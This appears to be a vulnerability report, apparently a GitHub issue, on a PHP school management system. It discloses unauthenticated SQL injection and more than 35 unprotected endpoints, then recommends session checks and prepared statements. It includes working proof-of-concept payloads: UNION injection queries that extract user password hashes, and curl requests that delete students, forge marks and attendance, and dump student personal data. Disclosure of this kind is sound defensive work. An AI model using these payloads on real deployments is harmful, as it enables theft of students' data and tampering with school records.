[Security] Unauthenticated SQLi + 35 Unprotected API Endpoints (SMS-01 to SMS-03)

[abdurazzoqovjavohir700-dev]

Security Vulnerability Report

Reported by: Javohir Abdurazzoqov (independent security researcher)
Date: 2026-06-18

---

Critical: Unauthenticated SQL Injection + 35+ Unprotected API Endpoints

SMS-01: SQL Injection in buslocation.php (Critical, CVSS 9.8)

File: student_panel/buslocation.php line 54

<?php
include('../assets/config.php');
// NO session check!

$sql = "SELECT * FROM bus_root WHERE bus_id='{$_GET['bus_id']}'";
$result = mysqli_query($conn, $sql);

PoC — Dump entire database via UNION:

GET /student_panel/buslocation.php?bus_id=' UNION SELECT table_name,2,3 FROM information_schema.tables WHERE table_schema=database()-- -

PoC — Extract student credentials:

GET /student_panel/buslocation.php?bus_id=' UNION SELECT id,email,password_hash FROM users-- -

---

SMS-02: 35+ Unauthenticated AJAX Endpoints in assets/ (Critical, CVSS 9.1)

All 35+ files in assets/ include only config.php (DB connection) with no session check. Anyone can call these endpoints directly:

File	Impact
removeStudent.php	Delete any student (with transaction rollback support)
removeTeacher.php	Delete any teacher
uploadMarks.php	Insert/forge exam marks for any student
submitAttendence.php	Forge attendance for any student/class
changeLeaveStatus.php	Approve/reject any leave request
addStudent.php	Add new students without login
addTeacher.php	Add new teachers without login
editStudent.php	Edit any student's personal data
editTeacher.php	Edit any teacher's data
fetchStudentInfo.php	Retrieve any student's PII (name, email, phone, address, guardian)
fetchStudents.php	Dump all students in any class
fetchTeachers.php	Dump all teachers

PoC — Delete student S1717xxxx:

curl -X POST https://TARGET/assets/removeStudent.php \
  -d "studentid=S1717xxxxx"
# Response: "success" — student deleted without any login

PoC — Forge attendance (all students absent):

curl -X POST https://TARGET/assets/submitAttendence.php \
  -H "Content-Type: application/json" \
  -d '[{"class":"10","section":"A","attendence":"absent"}]'

PoC — Upload fake exam marks:

curl -X POST https://TARGET/assets/uploadMarks.php \
  -H "Content-Type: application/json" \
  -d '{"S1234": {"examId": "E001", "marks": {"Math": "100", "Science": "100"}}}'

PoC — Get all student PII:

curl -X POST https://TARGET/assets/fetchStudents.php \
  -H "Content-Type: application/json" \
  -d '{"name":"","as":"10","a":"A"}'
# Returns: all student names, emails, phones, addresses, guardian info

---

SMS-03: SQL Injection in modal-teacher.php and modal-student.php (High, CVSS 8.6)

// owner_panel/modal-teacher.php line 98
$sql = "SELECT * FROM teachers where id = '{$_GET['id']}'";

// owner_panel/modal-student.php line 96  
$sql = "SELECT * FROM students where id = '{$_GET['id']}'";

Both accessible within authenticated owner panel — but still SQL injectable.

---

Fix

Add session validation to every assets/ file:

session_start();
if (!isset($_SESSION['user_id'])) {
    http_response_code(401);
    echo json_encode(["error" => "Unauthorized"]);
    exit();
}

Use prepared statements for buslocation.php:

$stmt = mysqli_prepare($conn, "SELECT * FROM bus_root WHERE bus_id = ?");
mysqli_stmt_bind_param($stmt, "s", $_GET['bus_id']);
mysqli_stmt_execute($stmt);

---

Reporter: Javohir Abdurazzoqov | abdurazzoqovjavohir700@gmail.com